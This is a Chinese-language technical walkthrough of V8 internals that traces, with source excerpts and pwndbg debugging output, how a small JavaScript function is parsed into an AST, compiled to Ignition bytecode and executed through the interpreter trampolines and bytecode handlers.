0x01 前置知识
从源代码到字节码
流程准备
v8执行JS的整个流程如下:JS源码经过Parser翻译为抽象语法树(AST),然后Interpreter遍历AST,生成ByteCode;ByteCode可以直接被解释执行,也可以在成为热点以后传给TurboFan进行JIT编译,TurboFan解优化时又可以回到字节码继续执行。
上图是一个抽象的概念图,我们来实际研究一下v8的源码,使用如下代码进行测试
function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
fun(true);
fun(false);
%SystemBreak();
首先打印一遍AST语法树,以便后续分析时对照使用
./d8 b.js --allow-natives-syntax --print-ast
[generating bytecode for function: ]
--- AST ---
FUNC at 0
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. DECLS
. . FUNCTION "fun" = function fun
. EXPRESSION STATEMENT at 125
. . CALL
. . . VAR PROXY unallocated (0x55c8247ae8b8) (mode = VAR, assigned = true) "fun"
. . . LITERAL true
. EXPRESSION STATEMENT at 136
. . CALL
. . . VAR PROXY unallocated (0x55c8247ae8b8) (mode = VAR, assigned = true) "fun"
. . . LITERAL false
. EXPRESSION STATEMENT at 148
. . ASSIGN at -1
. . . VAR PROXY local[0] (0x55c8247aea98) (mode = TEMPORARY, assigned = true) ".result"
. . . CALL RUNTIME SystemBreak at 148
. RETURN at -1
. . VAR PROXY local[0] (0x55c8247aea98) (mode = TEMPORARY, assigned = true) ".result"
[generating bytecode for function: fun]
--- AST ---
FUNC at 12
. KIND 0
. SUSPEND COUNT 0
. NAME "fun"
. PARAMS
. . VAR (0x55c8247b0908) (mode = VAR, assigned = false) "x"
. DECLS
. . VARIABLE (0x55c8247b0908) (mode = VAR, assigned = false) "x"
. . VARIABLE (0x55c8247b09b0) (mode = VAR, assigned = false) "a"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at 29
. . . INIT at 29
. . . . VAR PROXY local[0] (0x55c8247b09b0) (mode = VAR, assigned = false) "a"
. . . . LITERAL 1638
. IF at 39
. . CONDITION at 43
. . . VAR PROXY parameter[0] (0x55c8247b0908) (mode = VAR, assigned = false) "x"
. . THEN at -1
. . . BLOCK at -1
. . . . EXPRESSION STATEMENT at 54
. . . . . CALL
. . . . . . VAR PROXY unallocated (0x55c8247b0f88) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . . . . LITERAL "hello"
. . ELSE at -1
. . . BLOCK at -1
. . . . EXPRESSION STATEMENT at 88
. . . . . CALL
. . . . . . VAR PROXY unallocated (0x55c8247b0f88) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . . . . LITERAL "world"
. RETURN at 112
. . VAR PROXY local[0] (0x55c8247b09b0) (mode = VAR, assigned = false) "a"
d8中的Shell::ExecuteString
函数是执行js的入口,它调用了ScriptCompiler::Compile
函数进行脚本的编译
maybe_script = ScriptCompiler::Compile(
context, &script_source, ScriptCompiler::kNoCompileOptions);
跟踪该函数,它只是简单的设置参数,然后继续调用了CompileUnboundInternal
函数,该函数如下:
MaybeLocal<UnboundScript> ScriptCompiler::CompileUnboundInternal(
Isolate* v8_isolate, Source* source, CompileOptions options,
NoCacheReason no_cache_reason) {
...................
i::Handle<i::SharedFunctionInfo> result;
................
i::MaybeHandle<i::SharedFunctionInfo> maybe_function_info =
i::Compiler::GetSharedFunctionInfoForScript(
isolate, str, script_details, source->resource_options, nullptr,
script_data, options, no_cache_reason, i::NOT_NATIVES_CODE);
................
has_pending_exception = !maybe_function_info.ToHandle(&result);
RETURN_ON_FAILED_EXECUTION(UnboundScript);
RETURN_ESCAPED(ToApiHandle<UnboundScript>(result));
}
可见其调用了GetSharedFunctionInfoForScript
生成函数的一些信息,我们跟进去查看
MaybeHandle<SharedFunctionInfo> Compiler::GetSharedFunctionInfoForScript(
Isolate* isolate, Handle<String> source,
const Compiler::ScriptDetails& script_details,
ScriptOriginOptions origin_options, v8::Extension* extension,
ScriptData* cached_data, ScriptCompiler::CompileOptions compile_options,
ScriptCompiler::NoCacheReason no_cache_reason, NativesFlag natives) {
ScriptCompileTimerScope compile_timer(isolate, no_cache_reason);
.......................
// Do a lookup in the compilation cache but not for extensions.
MaybeHandle<SharedFunctionInfo> maybe_result;
IsCompiledScope is_compiled_scope;
if (extension == nullptr) {
bool can_consume_code_cache =
compile_options == ScriptCompiler::kConsumeCodeCache;
if (can_consume_code_cache) {
compile_timer.set_consuming_code_cache();
}
// First check per-isolate compilation cache.
maybe_result = compilation_cache->LookupScript(
source, script_details.name_obj, script_details.line_offset,
script_details.column_offset, origin_options, isolate->native_context(),
language_mode);
if (!maybe_result.is_null()) {
compile_timer.set_hit_isolate_cache();
} else if (can_consume_code_cache) {
compile_timer.set_consuming_code_cache();
// Then check cached code provided by embedder.
..........................
maybe_result = inner_result;
} else {
// Deserializer failed. Fall through to compile.
compile_timer.set_consuming_code_cache_failed();
}
}
}
if (maybe_result.is_null()) {
ParseInfo parse_info(isolate);
// No cache entry found compile the script.
NewScript(isolate, &parse_info, source, script_details, origin_options,
natives);
// Compile the function and add it to the isolate cache.
if (origin_options.IsModule()) parse_info.set_module();
parse_info.set_extension(extension);
parse_info.set_eager(compile_options == ScriptCompiler::kEagerCompile);
parse_info.set_language_mode(
stricter_language_mode(parse_info.language_mode(), language_mode));
maybe_result = CompileToplevel(&parse_info, isolate, &is_compiled_scope);
Handle<SharedFunctionInfo> result;
if (extension == nullptr && maybe_result.ToHandle(&result)) {
DCHECK(is_compiled_scope.is_compiled());
compilation_cache->PutScript(source, isolate->native_context(),
language_mode, result);
} else if (maybe_result.is_null() && natives != EXTENSION_CODE &&
natives != NATIVES_CODE) {
isolate->ReportPendingMessages();
}
}
return maybe_result;
}
可以看到,这里是对函数进行编译,首先检查是否已有缓存可用,如果没有,则开始新的编译,主要调用了CompileToplevel
函数
MaybeHandle<SharedFunctionInfo> CompileToplevel(
ParseInfo* parse_info, Isolate* isolate,
IsCompiledScope* is_compiled_scope) {
................
if (parse_info->literal() == nullptr &&
!parsing::ParseProgram(parse_info, isolate)) {
return MaybeHandle<SharedFunctionInfo>();
}
................
// Generate the unoptimized bytecode or asm-js data.
MaybeHandle<SharedFunctionInfo> shared_info =
GenerateUnoptimizedCodeForToplevel(
isolate, parse_info, isolate->allocator(), is_compiled_scope);
...............
FinalizeScriptCompilation(isolate, parse_info);
return shared_info;
}
该函数主要进行了三个操作,ParseProgram
生成AST语法树,调用GenerateUnoptimizedCodeForToplevel
生成字节码,最后调用FinalizeScriptCompilation
做一些后续工作。
ParseProgram
ParseProgram调用了DoParseProgram来完成解析的任务
FunctionLiteral* Parser::DoParseProgram(Isolate* isolate, ParseInfo* info) {
// Note that this function can be called from the main thread or from a
// background thread. We should not access anything Isolate / heap dependent
// via ParseInfo, and also not pass it forward. If not on the main thread
// isolate will be nullptr.
DCHECK_EQ(parsing_on_main_thread_, isolate != nullptr);
DCHECK_NULL(scope_);
DCHECK_NULL(target_stack_);
ParsingModeScope mode(this, allow_lazy_ ? PARSE_LAZILY : PARSE_EAGERLY);
ResetFunctionLiteralId();
DCHECK(info->function_literal_id() == FunctionLiteral::kIdTypeTopLevel ||
info->function_literal_id() == FunctionLiteral::kIdTypeInvalid);
FunctionLiteral* result = nullptr;
{
Scope* outer = original_scope_;
DCHECK_NOT_NULL(outer);
if (info->is_eval()) {
outer = NewEvalScope(outer);
} else if (parsing_module_) {
DCHECK_EQ(outer, info->script_scope());
outer = NewModuleScope(info->script_scope());
}
DeclarationScope* scope = outer->AsDeclarationScope();
scope->set_start_position(0);
FunctionState function_state(&function_state_, &scope_, scope);
ScopedPtrList<Statement> body(pointer_buffer());
..................
} else {
// Don't count the mode in the use counters--give the program a chance
// to enable script-wide strict mode below.
this->scope()->SetLanguageMode(info->language_mode());
ParseStatementList(&body, Token::EOS);
}
...................................
info->set_max_function_literal_id(GetLastFunctionLiteralId());
// Make sure the target stack is empty.
DCHECK_NULL(target_stack_);
if (has_error()) return nullptr;
return result;
}
该函数主要调用了ParseStatementList
函数,而该函数又调用ParseStatementListItem
template <typename Impl>
typename ParserBase<Impl>::StatementT
ParserBase<Impl>::ParseStatementListItem() {
// ECMA 262 6th Edition
// StatementListItem[Yield, Return] :
// Statement[?Yield, ?Return]
// Declaration[?Yield]
//
// Declaration[Yield] :
// HoistableDeclaration[?Yield]
// ClassDeclaration[?Yield]
// LexicalDeclaration[In, ?Yield]
//
// HoistableDeclaration[Yield, Default] :
// FunctionDeclaration[?Yield, ?Default]
// GeneratorDeclaration[?Yield, ?Default]
//
// LexicalDeclaration[In, Yield] :
// LetOrConst BindingList[?In, ?Yield] ;
switch (peek()) {
case Token::FUNCTION:
return ParseHoistableDeclaration(nullptr, false);
case Token::CLASS:
Consume(Token::CLASS);
return ParseClassDeclaration(nullptr, false);
case Token::VAR:
case Token::CONST:
return ParseVariableStatement(kStatementListItem, nullptr);
case Token::LET:
if (IsNextLetKeyword()) {
return ParseVariableStatement(kStatementListItem, nullptr);
}
break;
case Token::ASYNC:
if (PeekAhead() == Token::FUNCTION &&
!scanner()->HasLineTerminatorAfterNext()) {
Consume(Token::ASYNC);
return ParseAsyncFunctionDeclaration(nullptr, false);
}
break;
default:
break;
}
return ParseStatement(nullptr, nullptr, kAllowLabelledFunctionStatement);
}
该函数根据token的类型调用不同的解析函数进行解析。每个Parse函数内又调用其他Parse解析子语句,最终生成一个StatementT
节点,这是一种递归下降的分析方法。解析后通过body->Add(stat);
将StatementT
按照顺序添加到序列中。解析完成后回到DoParseProgram
函数
this->scope()->SetLanguageMode(info->language_mode());
ParseStatementList(&body, Token::EOS);
}
// The parser will peek but not consume EOS. Our scope logically goes all
// the way to the EOS, though.
scope->set_end_position(peek_position());
.....................
.....................
int parameter_count = parsing_module_ ? 1 : 0;
result = factory()->NewScriptOrEvalFunctionLiteral(
scope, body, function_state.expected_property_count(), parameter_count);
result->set_suspend_count(function_state.suspend_count());
}
info->set_max_function_literal_id(GetLastFunctionLiteralId());
// Make sure the target stack is empty.
DCHECK_NULL(target_stack_);
if (has_error()) return nullptr;
return result;
}
通过NewScriptOrEvalFunctionLiteral创建了一个FunctionLiteral对象,并将body等数据包装在内,然后将其作为结果返回。返回到ParseProgram
函数以后,将FunctionLiteral对象设置到info中,然后返回一个布尔值(result != nullptr)表示解析是否成功。
result = parser.ParseProgram(isolate, info);
info->set_literal(result);
if (result == nullptr) {
info->pending_error_handler()->ReportErrors(isolate, info->script(),
info->ast_value_factory());
} else {
info->set_language_mode(info->literal()->language_mode());
if (info->is_eval()) {
info->set_allow_eval_cache(parser.allow_eval_cache());
}
}
parser.UpdateStatistics(isolate, info->script());
return (result != nullptr);
}
GenerateUnoptimizedCodeForToplevel
接下来回到CompileToplevel
,有一点需要解释的是Toplevel的意思就是在脚本最外层的语句,如
var x = 1;
print(x);
function fun() {
var a = 1;
var b = 2;
}
其中在函数外面的语句以及function fun()这个声明都属于Toplevel,而在函数内部的则属于non-Toplevel。解析函数时通过调用ParseHoistableDeclaration
可以将函数中non-Toplevel部分解析。ParseProgram
得到AST以后,接下来调用GenerateUnoptimizedCodeForToplevel
函数生成字节码。
MaybeHandle<SharedFunctionInfo> GenerateUnoptimizedCodeForToplevel(
Isolate* isolate, ParseInfo* parse_info, AccountingAllocator* allocator,
IsCompiledScope* is_compiled_scope) {
EnsureSharedFunctionInfosArrayOnScript(parse_info, isolate);
parse_info->ast_value_factory()->Internalize(isolate);
if (!Compiler::Analyze(parse_info)) return MaybeHandle<SharedFunctionInfo>();
DeclarationScope::AllocateScopeInfos(parse_info, isolate);
// Prepare and execute compilation of the outer-most function.
// Create the SharedFunctionInfo and add it to the script's list.
Handle<Script> script = parse_info->script();
Handle<SharedFunctionInfo> top_level =
isolate->factory()->NewSharedFunctionInfoForLiteral(parse_info->literal(),
script, true);
该函数先是调用NewSharedFunctionInfoForLiteral
函数从parse_info->literal()生成一个SharedFunctionInfo
对象,并且该对象会被添加到所属script的shared_function_infos列表中
Handle<SharedFunctionInfo> Factory::NewSharedFunctionInfoForLiteral(
FunctionLiteral* literal, Handle<Script> script, bool is_toplevel) {
FunctionKind kind = literal->kind();
Handle<SharedFunctionInfo> shared = NewSharedFunctionInfoForBuiltin(
literal->name(), Builtins::kCompileLazy, kind);
SharedFunctionInfo::InitFromFunctionLiteral(shared, literal, is_toplevel);
SharedFunctionInfo::SetScript(shared, script, literal->function_literal_id(),
false);
return shared;
}
void SharedFunctionInfo::SetScript(Handle<SharedFunctionInfo> shared,
Handle<Object> script_object,
int function_literal_id,
bool reset_preparsed_scope_data) {
if (shared->script() == *script_object) return;
Isolate* isolate = shared->GetIsolate();
if (reset_preparsed_scope_data &&
shared->HasUncompiledDataWithPreparseData()) {
shared->ClearPreparseData();
}
// Add shared function info to new script's list. If a collection occurs,
// the shared function info may be temporarily in two lists.
// This is okay because the gc-time processing of these lists can tolerate
// duplicates.
if (script_object->IsScript()) {
DCHECK(!shared->script()->IsScript());
Handle<Script> script = Handle<Script>::cast(script_object);
Handle<WeakFixedArray> list =
handle(script->shared_function_infos(), isolate);
#ifdef DEBUG
DCHECK_LT(function_literal_id, list->length());
MaybeObject maybe_object = list->Get(function_literal_id);
HeapObject heap_object;
if (maybe_object->GetHeapObjectIfWeak(&heap_object)) {
DCHECK_EQ(heap_object, *shared);
}
#endif
list->Set(function_literal_id, HeapObjectReference::Weak(*shared));
.....................................
接下来就是编译函数了
std::vector<FunctionLiteral*> functions_to_compile;
functions_to_compile.push_back(parse_info->literal());
while (!functions_to_compile.empty()) {
FunctionLiteral* literal = functions_to_compile.back();
functions_to_compile.pop_back();
Handle<SharedFunctionInfo> shared_info =
Compiler::GetSharedFunctionInfo(literal, script, isolate);
if (shared_info->is_compiled()) continue;
if (UseAsmWasm(literal, parse_info->is_asm_wasm_broken())) {
..............................
}
std::unique_ptr<UnoptimizedCompilationJob> job(
interpreter::Interpreter::NewCompilationJob(
parse_info, literal, allocator, &functions_to_compile));
if (job->ExecuteJob() == CompilationJob::FAILED ||
FinalizeUnoptimizedCompilationJob(job.get(), shared_info, isolate) ==
CompilationJob::FAILED) {
return MaybeHandle<SharedFunctionInfo>();
}
主要是通过NewCompilationJob
创建了一个UnoptimizedCompilationJob对象,然后调用ExecuteJob
,实际上调用的函数是InterpreterCompilationJob::ExecuteJobImpl()
InterpreterCompilationJob::Status InterpreterCompilationJob::ExecuteJobImpl() {
RuntimeCallTimerScope runtimeTimerScope(
parse_info()->runtime_call_stats(),
parse_info()->on_background_thread()
? RuntimeCallCounterId::kCompileBackgroundIgnition
: RuntimeCallCounterId::kCompileIgnition);
// TODO(lpy): add support for background compilation RCS trace.
TRACE_EVENT0(TRACE_DISABLED_BY_DEFAULT("v8.compile"), "V8.CompileIgnition");
// Print AST if flag is enabled. Note, if compiling on a background thread
// then ASTs from different functions may be intersperse when printed.
MaybePrintAst(parse_info(), compilation_info());
generator()->GenerateBytecode(stack_limit());
if (generator()->HasStackOverflow()) {
return FAILED;
}
return SUCCEEDED;
}
该函数又调用了GenerateBytecode
,而GenerateBytecode继续调用GenerateBytecodeBody
void BytecodeGenerator::GenerateBytecodeBody() {
// Build the arguments object if it is used.
VisitArgumentsObject(closure_scope()->arguments());
// Build rest arguments array if it is used.
Variable* rest_parameter = closure_scope()->rest_parameter();
VisitRestArgumentsArray(rest_parameter);
// Build assignment to the function name or {.this_function}
// variables if used.
VisitThisFunctionVariable(closure_scope()->function_var());
VisitThisFunctionVariable(closure_scope()->this_function_var());
// Build assignment to {new.target} variable if it is used.
VisitNewTargetVariable(closure_scope()->new_target_var());
// Create a generator object if necessary and initialize the
// {.generator_object} variable.
if (IsResumableFunction(info()->literal()->kind())) {
BuildGeneratorObjectVariableInitialization();
}
// Emit tracing call if requested to do so.
if (FLAG_trace) builder()->CallRuntime(Runtime::kTraceEnter);
// Emit type profile call.
if (info()->collect_type_profile()) {
feedback_spec()->AddTypeProfileSlot();
int num_parameters = closure_scope()->num_parameters();
for (int i = 0; i < num_parameters; i++) {
Register parameter(builder()->Parameter(i));
builder()->LoadAccumulatorWithRegister(parameter).CollectTypeProfile(
closure_scope()->parameter(i)->initializer_position());
}
}
// Visit declarations within the function scope.
VisitDeclarations(closure_scope()->declarations());
// Emit initializing assignments for module namespace imports (if any).
VisitModuleNamespaceImports();
// Perform a stack-check before the body.
builder()->StackCheck(info()->literal()->start_position());
// The derived constructor case is handled in VisitCallSuper.
if (IsBaseConstructor(function_kind()) &&
info()->literal()->requires_instance_members_initializer()) {
BuildInstanceMemberInitialization(Register::function_closure(),
builder()->Receiver());
}
// Visit statements in the function body.
VisitStatements(info()->literal()->body());
// Emit an implicit return instruction in case control flow can fall off the
// end of the function without an explicit return being present on all paths.
if (builder()->RequiresImplicitReturn()) {
builder()->LoadUndefined();
BuildReturn();
}
}
其中的VisitDeclarations
用于处理函数中的变量声明,VisitStatements
用于处理语句。其中的参数info()->literal()->body()
是在Parser阶段生成的AST,VisitStatements实际上就是在遍历AST,然后生成对应的字节码。
void BytecodeGenerator::VisitStatements(
const ZonePtrList<Statement>* statements) {
for (int i = 0; i < statements->length(); i++) {
// Allocate an outer register allocations scope for the statement.
RegisterAllocationScope allocation_scope(this);
Statement* stmt = statements->at(i);
Visit(stmt);
if (builder()->RemainderOfBlockIsDead()) break;
}
}
FinalizeUnoptimizedCompilationJob
当AST遍历结束后,回到GenerateUnoptimizedCodeForToplevel函数,调用FinalizeUnoptimizedCompilationJob
完成后续步骤
CompilationJob::Status FinalizeUnoptimizedCompilationJob(
UnoptimizedCompilationJob* job, Handle<SharedFunctionInfo> shared_info,
Isolate* isolate) {
UnoptimizedCompilationInfo* compilation_info = job->compilation_info();
ParseInfo* parse_info = job->parse_info();
SetSharedFunctionFlagsFromLiteral(compilation_info->literal(), shared_info);
CompilationJob::Status status = job->FinalizeJob(shared_info, isolate);
if (status == CompilationJob::SUCCEEDED) {
InstallUnoptimizedCode(compilation_info, shared_info, parse_info, isolate);
CodeEventListener::LogEventsAndTags log_tag;
if (parse_info->is_toplevel()) {
log_tag = compilation_info->is_eval() ? CodeEventListener::EVAL_TAG
: CodeEventListener::SCRIPT_TAG;
} else {
log_tag = parse_info->lazy_compile() ? CodeEventListener::LAZY_COMPILE_TAG
: CodeEventListener::FUNCTION_TAG;
}
job->RecordFunctionCompilation(log_tag, shared_info, isolate);
job->RecordCompilationStats(isolate);
}
return status;
}
这里主要是通过InstallUnoptimizedCode
将相关信息(字节码等)设置到shared_info
中。这样,我们就完成了脚本的编译。
字节码执行
最后返回到d8的bool Shell::ExecuteString
时,执行maybe_result = script->Run(realm);
运行字节码。
MaybeLocal<Value> Script::Run(Local<Context> context) {
auto isolate = reinterpret_cast<i::Isolate*>(context->GetIsolate());
TRACE_EVENT_CALL_STATS_SCOPED(isolate, "v8", "V8.Execute");
ENTER_V8(isolate, context, Script, Run, MaybeLocal<Value>(),
InternalEscapableScope);
i::HistogramTimerScope execute_timer(isolate->counters()->execute(), true);
i::AggregatingHistogramTimerScope timer(isolate->counters()->compile_lazy());
i::TimerEventScope<i::TimerEventExecute> timer_scope(isolate);
auto fun = i::Handle<i::JSFunction>::cast(Utils::OpenHandle(this));
i::Handle<i::Object> receiver = isolate->global_proxy();
Local<Value> result;
has_pending_exception = !ToLocal<Value>(
i::Execution::Call(isolate, fun, receiver, 0, nullptr), &result);
RETURN_ON_FAILED_EXECUTION(Value);
RETURN_ESCAPED(result);
}
先是取到脚本对象,我们调试查看一下对象
auto fun = i::Handle<i::JSFunction>::cast(Utils::OpenHandle(this));
pwndbg> p fun
$2 = {
<v8::internal::HandleBase> = {
location_ = 0x55dab8532088
}, <No data fields>}
pwndbg> x /20gx 0x55dab8532088
0x55dab8532088: 0x000022c98b41e9f9 0x000022c98b41e869
0x55dab8532098: 0x000022c98b41e979 0x000022c98b41e869
0x55dab85320a8: 0x000022c98b41ea39 0x000022c98b41ea79
0x55dab85320b8: 0x000022c98b41ea89 0x000022c98b41e739
0x55dab85320c8: 0x000022c98b401749 0x00001b8cd50805b1
0x55dab85320d8: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab85320e8: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab85320f8: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab8532108: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab8532118: 0x1baddead0baddeaf 0x1baddead0baddeaf
pwndbg> job 0x000022c98b41e9f9
0x22c98b41e9f9: [Function] in OldSpace
- map: 0x0a2f0d2803b9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x22c98b401ff1 <JSFunction (sfi = 0x38046d688009)>
- elements: 0x1b8cd5080c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- function prototype:
- initial_map:
- shared_info: 0x22c98b41e869 <SharedFunctionInfo>
- name: 0x1b8cd5080751 <String[#0]: >
- formal_parameter_count: 0
- kind: NormalFunction
- context: 0x22c98b401749 <NativeContext[247]>
- code: 0x3d3e6a804281 <Code BUILTIN InterpreterEntryTrampoline>
- interpreted
- bytecode: 0x22c98b41e979 <BytecodeArray[54]>
- source code: function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
fun(true);
fun(false);
%SystemBreak();
- properties: 0x1b8cd5080c21 <FixedArray[0]> {
#length: 0x38046d6804b9 <AccessorInfo> (const accessor descriptor)
#name: 0x38046d680449 <AccessorInfo> (const accessor descriptor)
#arguments: 0x38046d680369 <AccessorInfo> (const accessor descriptor)
#caller: 0x38046d6803d9 <AccessorInfo> (const accessor descriptor)
#prototype: 0x38046d680529 <AccessorInfo> (const accessor descriptor)
}
- feedback vector: 0x22c98b41ea39: [FeedbackVector] in OldSpace
- map: 0x1b8cd5080bc1 <Map>
- length: 3
- shared function info: 0x22c98b41e869 <SharedFunctionInfo>
- optimized code/marker: OptimizationMarker::kNone
- invocation count: 0
- profiler ticks: 0
- slot #0 LoadGlobalNotInsideTypeof UNINITIALIZED {
[0]: [cleared]
[1]: 0x1b8cd5084da9 <Symbol: (uninitialized_symbol)>
}
- slot #2 kCreateClosure {
[2]: 0x22c98b41ea79 <FeedbackCell[no feedback]>
}
接下来调用Execution::Call
去执行,我们继续跟进,最终来到execution.cc中的V8_WARN_UNUSED_RESULT MaybeHandle<Object> Invoke
函数
In file: /home/sea/Desktop/v8/src/execution.cc
239 Handle<Code> code =
240 JSEntry(isolate, params.execution_target, params.is_construct);
241 {
242 // Save and restore context around invocation and block the
243 // allocation of handles without explicit handle scopes.
► 244 SaveContext save(isolate);
245 SealHandleScope shs(isolate);
246
247 if (FLAG_clear_exceptions_on_js_entry) isolate->clear_pending_exception();
248
249 if (params.execution_target == Execution::Target::kCallable) {
这里创建了一个JSEntry对象
pwndbg> p code
$5 = {
<v8::internal::HandleBase> = {
location_ = 0x5648828e5e68
}, <No data fields>}
pwndbg> x /20gx 0x5648828e5e68
0x5648828e5e68: 0x000018d75d483bc1 0x000018d75d483c21
0x5648828e5e78: 0x000018d75d483c81 0x000018d75d483ce1
0x5648828e5e88: 0x000018d75d483d41 0x000018d75d483da1
0x5648828e5e98: 0x000018d75d483e01 0x000018d75d483e61
0x5648828e5ea8: 0x000018d75d483ec1 0x000018d75d483f21
0x5648828e5eb8: 0x000018d75d483f81 0x000018d75d483fe1
0x5648828e5ec8: 0x000018d75d484041 0x000018d75d4840a1
0x5648828e5ed8: 0x000018d75d484101 0x000018d75d484161
0x5648828e5ee8: 0x000018d75d4841c1 0x000018d75d484221
0x5648828e5ef8: 0x000018d75d484281 0x000018d75d4842e1
pwndbg> job 0x000018d75d483bc1
0x18d75d483bc1: [Code]
- map: 0x1b37e74809e1 <Map>
kind = BUILTIN
name = JSEntry
compiler = unknown
address = 0x7ffcf9e0d580
Trampoline (size = 13)
0x18d75d483c00 0 49ba80b02ca4af7f0000 REX.W movq r10,0x7fafa42cb080 (JSEntry)
0x18d75d483c0a a 41ffe2 jmp r10
Instructions (size = 208)
0x7fafa42cb080 0 55 push rbp
0x7fafa42cb081 1 4889e5 REX.W movq rbp,rsp
0x7fafa42cb084 4 6a02 push 0x2
0x7fafa42cb086 6 4883ec08 REX.W subq rsp,0x8
0x7fafa42cb08a a 4154 push r12
0x7fafa42cb08c c 4155 push r13
0x7fafa42cb08e e 4156 push r14
.......................................
接下来将func作为参数传给JSEntry,并执行
In file: /home/sea/Desktop/v8/src/execution.cc
260 Address orig_func = params.new_target->ptr();
261 Address func = params.target->ptr();
262 Address recv = params.receiver->ptr();
263 Address** argv = reinterpret_cast<Address**>(params.argv);
264 RuntimeCallTimerScope timer(isolate, RuntimeCallCounterId::kJS_Execution);
► 265 value = Object(stub_entry.Call(isolate->isolate_data()->isolate_root(),
266 orig_func, func, recv, params.argc, argv));
267 } else {
268 DCHECK_EQ(Execution::Target::kRunMicrotasks, params.execution_target);
269
270 // clang-format off
我们单步跟入,接下来会执行Builtins_JSEntryTrampoline
0x7fafa42cb0f2 <Builtins_JSEntry+114> push 0
0x7fafa42cb0f4 <Builtins_JSEntry+116> mov r10, qword ptr [r13 + 0x2e28]
0x7fafa42cb0fb <Builtins_JSEntry+123> push qword ptr [r10]
0x7fafa42cb0fe <Builtins_JSEntry+126> mov r10, qword ptr [r13 + 0x2e28]
0x7fafa42cb105 <Builtins_JSEntry+133> mov qword ptr [r10], rsp
► 0x7fafa42cb108 <Builtins_JSEntry+136> call Builtins_JSEntryTrampoline <Builtins_JSEntryTrampoline>
rdi: 0x5648828dfec0 —▸ 0x1b37e7480751 ◂— 0x5200001b37e74804
rsi: 0x1b37e74804d1 ◂— 0x1b37e74805
rdx: 0x19494b71e9f9 ◂— 0x21000025b6b56803
rcx: 0x38c735b01521 ◂— 0x21000025b6b5687f
0x7fafa42cb10d <Builtins_JSEntry+141> mov r10, qword ptr [r13 + 0x2e28]
0x7fafa42cb114 <Builtins_JSEntry+148> pop qword ptr [r10]
0x7fafa42cb117 <Builtins_JSEntry+151> add rsp, 8
0x7fafa42cb11b <Builtins_JSEntry+155> pop rbx
0x7fafa42cb11c <Builtins_JSEntry+156> cmp rbx, 2
继续跟进,最终执行到Builtins_CallFunction_ReceiverIsAny+311时,其中rdi为func对象,这里从对象中取了一个index,并根据index取了一个函数进行调用
► 0x7fafa42bbab7 <Builtins_CallFunction_ReceiverIsAny+311> mov rcx, qword ptr [rdi + 0x2f]
0x7fafa42bbabb <Builtins_CallFunction_ReceiverIsAny+315> cmp dword ptr [rcx + 0x3b], -1
0x7fafa42bbabf <Builtins_CallFunction_ReceiverIsAny+319> jne Builtins_CallFunction_ReceiverIsAny+334 <Builtins_CallFunction_ReceiverIsAny+334>
↓
0x7fafa42bbace <Builtins_CallFunction_ReceiverIsAny+334> mov ecx, dword ptr [rcx + 0x3b]
0x7fafa42bbad1 <Builtins_CallFunction_ReceiverIsAny+337> mov rcx, qword ptr [r13 + rcx*8 + 0x2f70]
0x7fafa42bbad9 <Builtins_CallFunction_ReceiverIsAny+345> jmp rcx
继续执行,可以发现调用的函数是Builtins_InterpreterEntryTrampoline
,这个函数正是我们在func对象结构中看到的code处指向的函数
0x7fafa42bbab7 <Builtins_CallFunction_ReceiverIsAny+311> mov rcx, qword ptr [rdi + 0x2f]
0x7fafa42bbabb <Builtins_CallFunction_ReceiverIsAny+315> cmp dword ptr [rcx + 0x3b], -1
0x7fafa42bbabf <Builtins_CallFunction_ReceiverIsAny+319> jne Builtins_CallFunction_ReceiverIsAny+334 <Builtins_CallFunction_ReceiverIsAny+334>
↓
0x7fafa42bbace <Builtins_CallFunction_ReceiverIsAny+334> mov ecx, dword ptr [rcx + 0x3b]
0x7fafa42bbad1 <Builtins_CallFunction_ReceiverIsAny+337> mov rcx, qword ptr [r13 + rcx*8 + 0x2f70]
► 0x7fafa42bbad9 <Builtins_CallFunction_ReceiverIsAny+345> jmp rcx <Builtins_InterpreterEntryTrampoline>
由此可以知道,当执行一个JS函数时,入口函数是code指向的函数,这种特性非常的方便,因为如果要对一个函数进行JIT优化,可以直接将code指向优化后的函数,如果解优化,则再将code改回去即可。甚至还可以进行延迟编译,有时候我们并不需要立即将所有的函数都编译为字节码,在调用的时候再编译也是可以的,将code指向CompileLazy函数即可。我们继续跟踪,看看字节码是如何被解释执行的。
Builtins_InterpreterEntryTrampoline主要是做一些初始化工作,然后就进入第一条ByteCode的Handler
0x7fafa42d5d2b <Builtins_InterpreterEntryTrampoline+939> je Builtins_InterpreterEntryTrampoline+946 <Builtins_InterpreterEntryTrampoline+946>
↓
0x7fafa42d5d32 <Builtins_InterpreterEntryTrampoline+946> mov rax, qword ptr [r13 - 0x28]
0x7fafa42d5d36 <Builtins_InterpreterEntryTrampoline+950> mov r15, qword ptr [r13 + 0x1608]
0x7fafa42d5d3d <Builtins_InterpreterEntryTrampoline+957> movzx r11d, byte ptr [r14 + r9]
0x7fafa42d5d42 <Builtins_InterpreterEntryTrampoline+962> mov rcx, qword ptr [r15 + r11*8]
► 0x7fafa42d5d46 <Builtins_InterpreterEntryTrampoline+966> call rcx <Builtins_LdaConstantHandler>
rdi: 0x19494b71e9f9 ◂— 0x21000025b6b56803
rsi: 0x19494b701749 ◂— 0x1b37e7480f
rdx: 0x1b37e74804d1 ◂— 0x1b37e74805
rcx: 0x7fafa47ae180 (Builtins_LdaConstantHandler) ◂— lea rbx, [rip - 7]
每一个bytecode都对应了一个Handler,当进入首个Handler以后,就不再需要主控去调度执行下一个bytecode了,因为每个Handler以自动机的形式实现了在结尾自动执行到下一个bytecode的Handler里,如下所示
0x7f0a68ec946e <Builtins_LdaConstantHandler+750> mov r15, qword ptr [rbp - 0x20]
0x7f0a68ec9472 <Builtins_LdaConstantHandler+754> mov rcx, qword ptr [r15 + r8*8]
